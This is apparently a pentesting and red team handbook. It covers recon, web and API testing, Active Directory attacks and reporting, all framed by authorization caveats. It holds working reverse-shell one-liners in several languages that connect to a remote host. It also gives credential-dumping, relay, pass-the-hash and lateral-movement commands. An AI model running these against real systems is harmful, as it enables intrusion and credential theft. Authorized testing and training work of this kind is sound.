Pentesting

This site combines an expanded web application pentesting handbook with a practical red team operator reference for authorized security work. It is designed to be readable during live assessments, useful for labs and internal training, and strong enough to support planning, evidence collection, and reporting.

Authorized use only OWASP-aligned API-first coverage AD and operator workflow Cloud-aware Reporting ready

Please Note
This site has been refined from course notes and quick-reference material. It is intended as a practical knowledge base, not a substitute for vendor documentation, product-specific manuals, or engagement-specific rules of engagement. Tool syntax and flags can change over time, so always validate commands against the installed version before use.

Authorized Use Only

Area	Guidance
Targets	Test only systems you own, dedicated labs, or assets you are explicitly authorized to assess in writing.
Rules of engagement	Define scope, timing, allowed techniques, target ranges, testing accounts, escalation contacts, evidence handling rules, and prohibited actions before work starts.
Impact validation	Demonstrate findings with the smallest safe proof. Prefer read-only proof and avoid service disruption, mass credential testing, or unnecessary data access.
Evidence handling	Collect the minimum evidence needed, mask secrets and PII, and log what you tested and when.

Important: This reference is intended for professional security assessment, defensive validation, internal training, and lab use. Unauthorized access, destructive testing, or stealthy activity outside an approved engagement is out of bounds.

How to Use This Guide

During planning

Use the workflow, standards, and checklist sections to structure the engagement and define what evidence you need to collect.

During testing

Use the web app and operator sections as quick-reference material for reconnaissance, validation, and post-access decision making.

During reporting

Use the reporting section to convert raw findings into business-relevant, reproducible, remediation-ready writeups.

Red Team and Internal Pentest Workflow

Phase	Goal	Typical Outputs
Scope review	Understand what is allowed and what success looks like	Rules of engagement, target list, testing accounts, safety constraints
Reconnaissance	Map the attack surface	Domains, subdomains, hosts, routes, exposed services, identity clues
Initial access	Find the first valid foothold or weakness	Validated external exposure, app weakness, phish-safe simulation path, or valid access path
Credential harvesting	Identify weak auth paths and credential opportunities	Reset weaknesses, spray-safe findings, exposed creds, token flaws
Privilege escalation	Turn low privilege into higher privilege	Local escalation paths, delegated control abuse, misconfigurations
Lateral movement	Reach adjacent systems or roles	Validated reachable systems, protocol choices, role transitions
Persistence	Assess durability of access in a controlled way	Findings around account, token, service, task, or key persistence
Data access and exfiltration	Demonstrate business impact safely	Read-only proof, limited sample evidence, impact narrative
Reporting	Enable remediation and leadership decisions	Executive summary, attack narrative, evidence, risk, remediation

Practical note
This sequence matches common enterprise internal testing and aligns well with PTES-style workflow thinking: start with scope discipline, build a defensible attack narrative, and keep technical proof tied to business impact.

Standards and Framework Mapping

Reference	Best Use
OWASP WSTG	Primary structure for systematic web application testing.
OWASP Top 10	Broad risk framing for application findings.
OWASP API Security Top 10	Core reference for modern API-centric applications and mobile backends.
ASVS	Control-oriented remediation target and verification lens.
MITRE ATT&CK	Useful for describing adversary behavior chains, especially in red team and post-access scenarios.
PTES	Helpful for communicating overall assessment workflow and discipline.

Recommended Lab Setup

Web practice targets

OWASP Juice Shop
DVWA
WebGoat
PortSwigger Web Security Academy labs
crAPI

Operator practice targets

Windows and Linux VMs with realistic misconfigurations
Small Active Directory lab with delegated groups and service accounts
Reverse proxy and web app stack for auth, API, and JWT testing
Cloud sandbox with non-production IAM and storage paths

Recon Strategy

High-value sequence

Identify root domains, known brands, and common subdomain patterns.
Probe for live hosts, titles, technologies, and TLS posture.
Collect historical URLs and crawl the current application.
Prioritize auth routes, APIs, admin paths, upload features, and third-party integrations.
Map trust boundaries: anonymous, standard user, privileged user, admin, service account, and tenant boundaries.

Subdomains and OSINT

Tool	Primary Use	Why It Matters
Amass	Subdomain discovery and graph-style infrastructure enrichment	Great for broad domain discovery and correlation.
Subfinder	Fast passive subdomain enumeration	Good early-stage triage tool.
theHarvester	Email and host discovery	Useful for identity clues and potential auth surface; supported sources vary by version and configuration.
Maltego	Relationship mapping	Helpful when infrastructure and identities span many assets.
Shodan / Censys	Internet-facing service discovery	Good for exposed services, certificates, and historical clues.

amass enum -d example.com
subfinder -d example.com
theHarvester -d example.com -b crtsh
httpx -l domains.txt -status-code -title

Version note. Tool flags and data-source support can change across releases. Validate syntax against the installed version before use.

Network Discovery

Common discovery patterns

nmap -sn 10.10.10.0/24
nmap -p- -T4 target
nmap -sV target
nmap -A target

Use the least noisy approach the engagement allows. Start broad, then focus. nmap -A is comparatively noisy and is not always appropriate as an early first step.

Important ports to recognize quickly

Port	Service
22	SSH
80 / 443	HTTP / HTTPS
139 / 445	SMB
3389	RDP
389 / 636	LDAP / LDAPS
5985 / 5986	WinRM / WinRM HTTPS

Content Discovery

Goal	Example	Notes
Directory and file discovery	`ffuf -u https://target/FUZZ -w wordlist.txt -mc 200,204,301,302,307,401,403`	Triage by response code, title, and size.
Response-size filtering	`ffuf -u https://target/FUZZ -w wordlist.txt -fs 4242`	Useful against soft-404 behavior.
Parameter discovery	`ffuf -u "https://target/page?FUZZ=test" -w params.txt`	Helps uncover hidden input points.
Virtual host discovery	`ffuf -u https://target/ -H "Host: FUZZ.target.example.com" -w subdomains.txt`	Useful when multiple apps share a single IP or origin.
Recursive discovery	`feroxbuster -u https://target.example.com -k`	Good for deeper path structures and nested routes.

Historical URLs and Deprecated Endpoints

gau target.example.com
waybackurls target.example.com
katana -u https://target.example.com -d 3 -jc

Old password reset routes, debug handlers, testing endpoints, and deprecated API versions often survive long after the front end stops linking to them.

JavaScript Analysis

Look For	Why It Matters
API endpoints	Front-end bundles often reveal undocumented routes and object shapes.
Source maps	May disclose original source layout and internal identifiers.
Feature flags	Can reveal partially deployed or hidden features.
Debug logic	May expose assumptions, test routes, or auth shortcuts.
Embedded tokens or keys	May reveal client credentials, weak non-production secrets, or trusted origins.

curl -s https://target.example.com/static/app.js | grep -Ei "api|token|secret|auth|key"
python linkfinder.py -i https://target.example.com/app.js

Fingerprinting and Initial Triage

Headers to review

Server
Set-Cookie
Content-Security-Policy
Strict-Transport-Security
X-Frame-Options
Referrer-Policy

What to infer

Framework and hosting clues
Cookie posture and session style
CSP maturity
CDN or WAF behavior
Where auth and proxy boundaries probably live

TLS and HTTPS Security

Check	Example Command	What to Review
Protocol and cipher support	`testssl.sh https://target.example.com`	Deprecated protocol support, weak ciphers, downgrade posture.
Cipher enumeration	`nmap --script ssl-enum-ciphers -p 443 target.example.com`	Weak or legacy suites and negotiation issues.
Certificate and TLS analysis	`sslyze target.example.com`	Expiry, chain validity, stapling, and config posture.

HTTP Fundamentals

Common curl patterns

curl -i https://target.example.com
curl -I https://target.example.com
curl -L https://target.example.com
curl -H "X-Test: 1" https://target.example.com
curl -b "session=VALUE" https://target.example.com/account

Method and payload testing

curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"name":"test"}' \
  https://target.example.com/api/items

curl -X OPTIONS -i https://target.example.com/api/items
curl -X PUT -i https://target.example.com/api/items/1

Authentication Testing

Area	What to Test	Common Failure
Login	Error consistency, lockouts, MFA enforcement, throttling	Enumeration or weak brute-force protection.
Password reset	Token entropy, expiry, reuse, and account binding	Predictable or long-lived reset paths.
Account recovery	Support or secondary-channel recovery logic	Identity assurance weaker than the primary login.
MFA	Enrollment, reset, alternate flows, and direct API usage	Second factor enforced in UI but not server-side.
Session rotation	Compare pre-auth and post-auth tokens	Fixation or weak rotation after elevation.

Session Management

Control	Purpose	Check
`Secure`	Restricts cookie to HTTPS	Should be set on session cookies.
`HttpOnly`	Blocks direct JavaScript access	Reduces cookie theft through many XSS paths.
`SameSite`	Limits cross-site cookie sending	Interpret in the context of CSRF-sensitive flows and legitimate cross-site auth patterns.
Invalidation	Ends a session after logout or secret changes	Old tokens should stop working quickly.
Reauthentication	Protects sensitive changes	Profile, password, MFA, and payment changes often need step-up auth.

Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Lax

This cookie example is illustrative, not universal. Some applications legitimately require SameSite=None; Secure for cross-site flows such as federated sign-in.

Authorization Testing

Issue	Description	Example
IDOR / BOLA	Object-level checks fail when identifiers change	`GET /api/orders/1001`
Horizontal escalation	User reaches another user's data or actions	`GET /account?id=102`
Vertical escalation	Lower-privileged user reaches admin-only functions	`GET /admin/users`
Forced browsing	Hidden routes stay directly reachable	`/internal`, `/export`, `/support/admin`
Function-level bypass	Backend trusts the UI to hide actions	Endpoint executes even when the button is hidden.

Input Validation and Injection Surface

Class	Examples	What to Watch
Command injection	Ping tools, image processors, backup wrappers	Shell expansion, unsafe argument building, wrappers around system binaries.
Path traversal	Downloads, image retrieval, archive extraction	Normalization and canonicalization weaknesses.
Server-side template injection	Email previews, theming, rendering helpers	User input reaching a server-side template engine.
XXE	Legacy XML import or SSO parsing	Entity expansion and external fetch behavior.
NoSQL / LDAP injection	Directory-backed auth or search	Weak parser and query construction assumptions.

Cross-Site Scripting (XSS)

Type	Description	Common Locations
Reflected	Payload appears immediately in the server response	Search, errors, support pages
Stored	Payload persists and executes for later viewers	Comments, tickets, profiles, dashboards
DOM-based	Execution happens client-side through unsafe sinks	Hash parsing, query parsing, templating logic

Focus on context and sink, not canned payloads. What matters most is exactly where the input lands, how it is encoded, and what the CSP allows.

SQL Injection

Type	Signal	Notes
Error-based	Parser or DB details appear in the response	Often surfaces in APIs, admin pages, or debug handlers.
Union-based	Extra result sets can be reflected	Most useful when output is rendered directly.
Boolean blind	Content changes between true and false conditions	Works where the page reacts measurably.
Time-based blind	Server delay confirms execution path	Use database-specific timing primitives.

Database-specific timing examples

Database	Representative Delay Function
MySQL	`SLEEP(5)`
PostgreSQL	`pg_sleep(5)`
Microsoft SQL Server	`WAITFOR DELAY '0:0:5'`
Oracle	`dbms_pipe.receive_message(...)` or another environment-appropriate timing primitive

Safer automation follow-up

sqlmap -u "https://target/item?id=1" --batch --risk=2 --level=2
sqlmap -r request.txt --batch
sqlmap -u "https://target/item?id=1" --dbs

Server-Side Request Forgery (SSRF)

Target	Why It Matters
`127.0.0.1` / `localhost`	May expose loopback-only services.
Internal RFC1918 ranges	Can reveal admin panels, internal APIs, and management services.
AWS metadata	Historically reachable via IMDSv1; modern environments may require IMDSv2.
Azure / GCP metadata	Use provider-specific headers and paths when reasoning about impact.

Practical impact depends heavily on egress controls, URL parser behavior, redirect handling, DNS resolution, and metadata protections in the target environment.

File Upload Security

Weakness	What to Test	Modern Note
Extension-only validation	Whether only the filename extension is checked	Parser and storage behavior usually matter more than filename tricks alone.
MIME trust	Whether the server trusts client-supplied `Content-Type`	Client MIME values are not authoritative.
Magic-byte and signature handling	Whether content is actually parsed and validated	Image transforms and archive processing are common weak points.
Storage path and execution	Whether files land in web-executable locations	Segregated, non-executable storage is key.
Archive extraction	Traversal, overwrite, and nested file handling	Common in bulk import workflows.

CSRF, CORS, CSP, and Browser-Enforced Controls

CSRF

Review anti-CSRF token generation and validation.
Check Origin and Referer handling for state-changing requests.
Interpret SameSite cookie behavior in the context of the app's flows.

CORS

curl -I -H "Origin: https://evil.example" https://target.example.com/api

Look for origin reflection, unsafe wildcarding, and risky credential behavior. Remember that CORS risk depends on the full header combination; Access-Control-Allow-Origin: * alone does not create credentialed cross-origin access.

CSP

Review inline script allowances.
Check script-src, object-src, and frame-ancestors.
Look for trusted third-party domains that weaken intent.

Rate limiting

Test login, reset, OTP, invite, and search routes.
Determine whether limits are account-based, IP-based, route-based, or absent.

API Security

Risk Area	What It Looks Like
Broken object level authorization	Changing an object ID exposes another record.
Broken function level authorization	User can invoke privileged routes directly.
Broken authentication	Weak token handling, missing revocation, weak issuance logic.
Excessive data exposure	API returns fields the client does not actually need.
Mass assignment	Security-sensitive fields are accepted from the client.
Resource consumption	Expensive requests create denial-of-service or cost impact.

GraphQL Security

Area	Concern
Introspection	Schema exposure accelerates discovery.
Authorization	Field-level and object-level checks are often inconsistent.
Excessive data exposure	Single queries may expose fields not intended for the client UI.
Depth and complexity	Nested requests and batching can create expensive execution paths.

{
  user(id: "1") {
    username
    email
    role
  }
}

Disabling introspection alone does not secure a GraphQL deployment. Resolver authorization, query cost controls, and schema-aware review still matter.

WebSocket Security

Concern	What to Validate
Authentication at connect time	Can stale or unauthenticated clients still connect?
Authorization per action	Is every event authorized server-side?
Message tampering	Can role, tenant, or object identifiers be modified?
Subscription boundaries	Can one client subscribe to another user's or tenant's stream?

JWT Security

Issue	Practical Note
Weak HMAC secret	Still one of the most common real-world JWT failures.
Key confusion	Verification logic may misuse asymmetric key material.
`kid` misuse	Header-controlled key selection can create dangerous lookups.
JWKS trust flaws	Remote trust and caching logic can create verification weaknesses.
`alg=none`	Primarily a legacy issue; modern libraries generally reject it unless misconfigured, but it remains important historically.

python3 - <<'PY'
import base64
payload = "HEADER.PAYLOAD.SIGNATURE".split(".")[1]
payload += "=" * (-len(payload) % 4)
print(base64.urlsafe_b64decode(payload).decode())
PY
jwt_tool token -C

JWT segments use base64url encoding, so a naive base64 -d command may fail unless padding and URL-safe character handling are accounted for.

OAuth and SSO

Concern	Description
`state` handling	Weak or missing state can enable login CSRF and flow confusion.
`redirect_uri` validation	Loose validation can send codes or tokens to attacker-controlled locations.
PKCE posture	Important for public clients and now broadly recommended across modern authorization code flows.
Token leakage	Review fragments, redirects, browser history, and log exposure.
Open redirects	Often become useful supporting issues in OAuth abuse chains.

Business Logic Testing

Pattern	Examples
Workflow bypass	Skipping approval, payment, or verification steps.
Race conditions	Coupon reuse, duplicate redemption, quota bypass, balance double-spend.
Price or discount abuse	Manipulating quantity, currency, promotions, or bundled calculations.
Tenant confusion	Cross-tenant actions through poorly scoped identifiers.

Deserialization Risks

Insecure deserialization remains relevant in enterprise and legacy environments, especially where applications accept serialized objects, state blobs, or framework-specific data containers.

Environment	Common Areas
Java	Serialized objects, session replication, message queues, legacy frameworks.
.NET	Historically common in misconfigured view state handling, custom binary serializers, and internal APIs.
PHP	Unsafe `unserialize` flows and object injection.
Python / Node	Unsafe custom serialization and framework-specific state handling.

HTTP Request Smuggling

Concept	Why It Matters
Parser disagreement	Front-end and back-end components disagree about request boundaries.
Impact	Can lead to response desync, auth confusion, cache poisoning, and request hijacking.
Indicators	Inconsistent handling of `Content-Length` and `Transfer-Encoding`, strange queueing, mismatched responses, or translation issues at proxy boundaries.

Web Cache Poisoning and Deception

Issue	Description
Cache poisoning	Attacker influences a cached response seen by other users.
Cache deception	Sensitive content is served under a path likely to be cached incorrectly.
Header-driven abuse	Rewrite or proxy-related headers influence what gets cached.

Prototype Pollution

Prototype pollution is important when user-controlled keys influence deep merges or object assignment. Severity depends on how the polluted state affects auth, rendering, or backend logic.

Key Paths	Potential Consequences
`__proto__`, `constructor.prototype`	XSS, logic bypass, privilege escalation, or even code execution in some stacks.

HTTP/2 and Modern Transport Risks

Area	Notes
HTTP/2 desync behavior	Modern infrastructures can create parser differences invisible in HTTP/1.1-only testing.
Rapid reset and resource abuse	Protocol-layer misuse can create resource exhaustion even when app logic is sound.
Proxy translation	HTTP/2-to-HTTP/1 boundaries may introduce request handling edge cases.

SMB Enumeration

Task	Representative Command	Why It Matters
List shares	`smbclient -L \\target`	Quickly identifies exposed share names and access posture.
Check SMB signing	`nmap --script smb2-security-mode.nse -p445 target`	Useful when reasoning about relay exposure and overall hardening.
Enumerate at scale	`nxc smb target-range -u users.txt -p passwords.txt`	Can validate reachability, auth posture, and share behavior when explicitly in scope.

LDAP Enumeration

Use	Representative Command
Basic directory query	`ldapsearch -x -H ldap://target -b "DC=domain,DC=com"`
Extract usernames	`ldapsearch -x -H ldap://target -b "DC=domain,DC=com" \| grep sAMAccountName`
Domain dump	`ldapdomaindump ldaps://target -u 'domain\user' -p password`

LDAP is often one of the richest ways to understand an Active Directory environment, especially when it comes to users, groups, and service account patterns.

Web Enumeration

Manual checks

robots.txt
Source code and comments
HTTP headers
Error pages and stack clues
Anonymous versus authenticated differences

Automated support

nikto -h http://target
gobuster dir -u http://target -w wordlist.txt

Use scanners to support manual testing, not replace it.

NTLM Relay, WPAD, and IPv6 Exposure Awareness

Lab-only topic. Relay-related testing can disrupt authentication and proxy behavior and can expose directory services if misused. Do not test these techniques outside a controlled lab or without explicit written authorization.

In Active Directory environments, weak legacy authentication paths can allow an attacker to coerce or intercept NTLM authentication and attempt to relay it to another service such as LDAP or LDAPS. Common exposure paths have historically involved name-resolution weaknesses, WPAD behavior, and unmanaged IPv6-related configurations.

Area	Why It Matters
NTLM relay	Authentication material may be forwarded to another service if signing and channel protections are weak or absent.
WPAD abuse	Auto-proxy discovery can create opportunities for traffic interception or credential exposure in poorly hardened environments.
IPv6 exposure	Organizations that do not actively use IPv6 may still leave it enabled, creating unexpected attack surface.
LDAP / LDAPS targeting	Directory services can be especially high impact if relay protections are incomplete.

Representative Lab Commands

# Example responder invocation in a controlled lab
sudo responder -I eth0 -dPv

# Example lab sequencing only; exact syntax and behavior vary by tool version
ntlmrelayx.py -6 -t ldaps://<dc ip> -wh <fakewpad.domain.com> -l LOOT
sudo mitm6 -d <domain.com>

Precision matters. Successful relay does not automatically create privileged access or new administrative accounts. Real-world impact depends on the relayed identity, the target service, and whether protections such as LDAP signing, channel binding, and SMB signing are enforced.

Defensive Review Points

Require LDAP signing and channel binding where supported.
Reduce or disable NTLM where feasible and prioritize Kerberos.
Review WPAD usage and disable unnecessary auto-discovery behavior.
Harden IPv6 deliberately rather than leaving it unmanaged by default.
Monitor for unusual proxy discovery, rogue name resolution behavior, and anomalous authentication flows.
Use tiered administration and avoid logging privileged accounts into lower-trust systems.

Assessment guidance
During an authorized review, document whether the environment relies on NTLM, whether LDAP signing is enforced, whether WPAD is in use, and whether IPv6 has been intentionally secured. The most valuable outcome is usually identifying and closing the configuration gap rather than attempting risky live validation in production.

Active Directory Defensive Checks

Control Area	What to Verify	Why It Matters
LDAP signing	Domain controllers require LDAP signing and support channel binding.	Reduces exposure to relay against directory services.
SMB signing	Servers and workstations enforce SMB signing where appropriate.	Makes classic relay paths harder.
NTLM reduction	Audit where NTLM is still required and restrict it over time.	Lowers reliance on legacy authentication.
WPAD	Determine whether auto-proxy discovery is necessary and whether it is tightly controlled.	Reduces proxy-discovery abuse opportunities.
IPv6	Confirm whether IPv6 is intentionally deployed and monitored.	Prevents unmanaged protocol exposure.
Privileged admin hygiene	Do not use highly privileged accounts on lower-trust systems.	Limits blast radius if a workstation is compromised.

Defensive Command Cheat Sheet

# Check LDAP signing policy on domain controllers (Windows)
reg query "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v LDAPServerIntegrity

# Check NTLM audit / restriction-related policies (Windows)
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LmCompatibilityLevel

# Review SMB signing posture (Windows PowerShell)
Get-SmbServerConfiguration | Select EnableSecuritySignature, RequireSecuritySignature
Get-SmbClientConfiguration | Select EnableSecuritySignature, RequireSecuritySignature

# Check whether IPv6 is enabled on Linux
ip -6 addr
sysctl net.ipv6.conf.all.disable_ipv6
sysctl net.ipv6.conf.default.disable_ipv6

# Check whether IPv6 is bound on Windows adapters (PowerShell)
Get-NetAdapterBinding -ComponentID ms_tcpip6

# Review WPAD / proxy auto-discovery settings on Windows
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoDetect
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL

# Quick LDAP over TLS reachability check from Linux
openssl s_client -connect dc01.example.com:636 -brief

# Kerberos-focused discovery reminder
klist
setspn -Q */*

Safer validation approach. In production, prioritize configuration review, policy confirmation, logging checks, and non-disruptive verification over live relay attempts.

Credential Attacks

Pattern	Representative Command	Notes
Password spraying	`nxc smb 10.10.10.0/24 -u users.txt -p 'Password123'`	Only within explicit ROE; rate limits and lockout policy matter.
Pass-the-hash	`nxc smb 10.10.10.0/24 -u administrator -H <NTLM_HASH>`	Relevant after legitimate hash exposure in a controlled test.
Offline cracking	`hashcat -m 1000 hashes.txt rockyou.txt`	Use for authorized validation and password quality assessment.

Kerberos Attack Paths

Technique	Representative Command	What It Tests
Kerberoasting	`impacket-GetUserSPNs domain/user:password -dc-ip dc.example.local -request`	Service account password strength and SPN exposure.
AS-REP roasting	`impacket-GetNPUsers domain/ -usersfile users.txt -no-pass`	Accounts without preauthentication requirements.
Golden ticket concept validation	`mimikatz kerberos::golden`	Illustrates domain-level persistence risk after severe compromise, typically only after access to highly sensitive Kerberos material.

Active Directory Attack Paths

Pattern	Why It Matters
DCSync	Represents domain replication rights and severe compromise potential.
ACL abuse	Delegation and object permissions can quietly enable takeover paths.
RBCD	Resource-based constrained delegation can allow service abuse and impersonation paths.
Shadow credentials	Modern identity abuse path involving alternate authentication material.
ADCS abuse	Certificate services can become a high-impact identity escalation path.

Graph-based analysis tools can help distinguish theoretically possible privilege paths from those that are currently reachable and exploitable in a specific environment.

Windows Privilege Escalation

Area	What to Look For
Service configuration	Unquoted service paths, weak service permissions, replaceable binaries.
Token privileges	Dangerous privileges that can be leveraged by the current user context.
DLL search order issues	Applications loading libraries from writable or unsafe locations.
Installer policy	`AlwaysInstallElevated` and other weak system-wide policy decisions.

Linux Privilege Escalation

Area	Representative Check
SUID binaries	`find / -perm -4000 -type f 2>/dev/null`
Sudo rights	`sudo -l`
Cron and timers	Writable jobs, insecure scripts, unsafe service execution paths.
Environment abuse	PATH manipulation, writable directories, and weak capability assignments.

Lateral Movement

Technique	Representative Command
PSExec-style movement	`impacket-psexec domain/user:password@target`
WMI-based movement	`impacket-wmiexec domain/user:password@target`
WinRM	`evil-winrm -u user -p password -i target`
SMBExec pattern	`impacket-smbexec domain/user:password@target`

Choose the least disruptive protocol path that still validates the finding. Transport choice matters for noise, logging, and business safety.

Credential Dumping

Goal	Representative Command
Dump local or remote secrets	`impacket-secretsdump domain/user:password@target`
Focus on domain controller NTLM material	`impacket-secretsdump domain/user:password@dc-ip -just-dc-ntlm`

Because this activity can be highly sensitive, only use it when explicitly authorized and only to the minimum degree needed to prove impact.

Pivoting

Task	Representative Command	Use
Create a SOCKS proxy	`ssh -f -N -D 9050 user@pivot`	Lets tools reach internal paths through an intermediate host.
Use the proxy	`proxychains nmap -sT target`	Validates internal reachability, but remember not all scan types behave well through SOCKS proxies.

Persistence

Platform	Common Patterns
Windows	New admin accounts, scheduled tasks, services, registry run keys, ticket abuse.
Linux	SSH keys, cron jobs, systemd services, shell initialization files.
Identity	Long-lived tokens, certificates, delegated roles, or hidden trust relationships.

In assessments, persistence is usually best documented as a risk path and validated in the safest possible way, rather than fully weaponized.

Reverse Shell Reference

Bash

Reliable on most modern Linux systems (Tested on Ubuntu).

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Python

Standard one-liner for Python 2.7+ environments.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl

Feature-free short version.

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP

Assumes TCP connection uses file descriptor 3.

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat (Traditional)

Requires netcat versions compiled with -e support.

nc -e /bin/sh 10.0.0.1 1234

Netcat (OpenBSD / FIFO)

Used when -e is unavailable.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm Reverse Session

Run on the target server to connect back to your X-Server on port 6001:

xterm -display 10.0.0.1:1

On your host, start Xnest and authorize the target:

Xnest :1
xhost +targetip

Cloud and Container Security Surface

Platform	What to Review
AWS	IAM users and roles, bucket posture, bucket policy exposure, metadata handling, signed URL misuse.
Azure	Managed identity assumptions, app service settings, storage access, metadata patterns.
GCP	Service account scope, metadata headers, storage and function exposure.
Docker	Exposed sockets, unsafe mounts, container-to-host assumptions.
Kubernetes	Dashboard exposure, RBAC posture, service account token handling, node metadata reachability.

aws iam list-users
aws iam list-roles
aws s3 ls
aws s3api get-bucket-policy --bucket example-bucket

These commands assume an authorized review using valid cloud credentials or an approved cloud assessment context.

Modern Operator Toolset

Identity & AD

BloodHound: Visualizes AD privilege paths using graph theory to find takeover routes.

NetExec (NXC): The industry-standard successor to CrackMapExec for large-scale enumeration.

C2 & Shells

Sliver: A robust, cross-platform open-source C2 framework for modern operations.

Responder: Captures NTLM hashes via LLMNR/NBT-NS and MDNS poisoning.

Analysis & Scanners

Nuclei: High-speed, template-based scanning for CVEs and misconfigurations.

Wireshark: Crucial for deep packet inspection and analyzing custom protocol traffic.

Red Team Infrastructure

Typical components

VPS or cloud instances
Redirectors and reverse proxies
C2 server
Payload or file hosting where explicitly approved
Encrypted channels and controlled logging

Design principles

Separate externally exposed redirectors from management systems.
Use least privilege and short-lived infrastructure where possible.
Document domains, IPs, TLS posture, and teardown plans.
Rotate and clean up infrastructure after the engagement.

Operational Security

Practice	Reason
Limit scanning noise	Reduces business risk and keeps testing disciplined.
Rotate infrastructure	Improves hygiene and reduces residual exposure.
Avoid unnecessary disk writes	Reduces operational footprint and artifact sprawl.
Prefer encrypted channels	Protects evidence and management traffic.
Log your own actions carefully	Essential for reporting, troubleshooting, and explaining impact.

Reporting Structure

Section	What Good Looks Like
Executive summary	Business-relevant summary of what matters, not a tool dump.
Attack narrative	Clear story from initial weakness to impact.
Evidence	Minimal but sufficient request/response pairs, sanitized screenshots, timestamps, affected assets.
Risk ratings	Consistent severity plus explanation of business impact.
Remediation guidance	Actionable, control-oriented fixes with enough engineering detail to act.

Strong finding summary
A standard user was able to retrieve another user's invoice details by modifying an object identifier in a JSON API path. The issue affected multiple accounts, required no elevated privileges, and exposed customer billing data because the server trusted client-supplied object references without validating ownership.

Burp-Centered Workflow

Core components

Component	Use
Proxy	Capture and inspect application traffic.
Repeater	Modify and replay requests precisely.
Intruder	Test identifiers, parameters, and workflow variations.
Decoder	Unpack and manipulate encoding layers.

Helpful extensions

Extension	Use
Autorize	Authorization differential testing.
InQL	GraphQL discovery and testing.
JWT Editor	JWT inspection and modification.
Logger++	Organized logging during larger assessments.

Extension names and availability can change over time, so treat these as representative examples.

Operator Checklists

Pre-engagement

Written authorization received
Scope, contacts, windows, and stop conditions documented
Test accounts validated
Evidence handling and reporting expectations agreed

Web app testing

Anonymous and authenticated baselines recorded
Auth, session, and role boundaries mapped
APIs and object identifiers enumerated
High-value functions validated for authz and business logic

Post-access

Privilege boundaries documented
Safe proof of impact captured
Noise and business safety reviewed before moving laterally
Persistence paths documented, not overused

Reporting

Every finding tied to an affected asset and role
Evidence sanitized
Remediation written for engineers and leadership
Risk reflects real business impact

Command Cheat Sheet

Task	Command
Passive subdomain discovery	`subfinder -d example.com`
Expanded domain discovery	`amass enum -d example.com`
Probe live hosts	`httpx -l domains.txt -status-code -title`
Historical URLs	`gau target.example.com`
Archive URLs	`waybackurls target.example.com`
Crawl current app	`katana -u https://target.example.com -d 3`
Directory fuzzing	`ffuf -u https://target/FUZZ -w wordlist.txt -mc 200,204,301,302,307,401,403`
Web scan support	`nikto -h http://target`
Live host discovery	`nmap -sn 10.10.10.0/24`
Service detection	`nmap -sV target`
List SMB shares	`smbclient -L \\target`
LDAP query	`ldapsearch -x -H ldap://target -b "DC=domain,DC=com"`
Password quality validation	`hashcat -m 1000 hashes.txt rockyou.txt`
Kerberoasting check	`impacket-GetUserSPNs domain/user:password -dc-ip dc.example.local -request`
Linux SUID review	`find / -perm -4000 -type f 2>/dev/null`
WinRM movement	`evil-winrm -u user -p password -i target`
SOCKS pivot	`ssh -f -N -D 9050 user@pivot`
AWS quick inventory	`aws iam list-users && aws iam list-roles && aws s3 ls`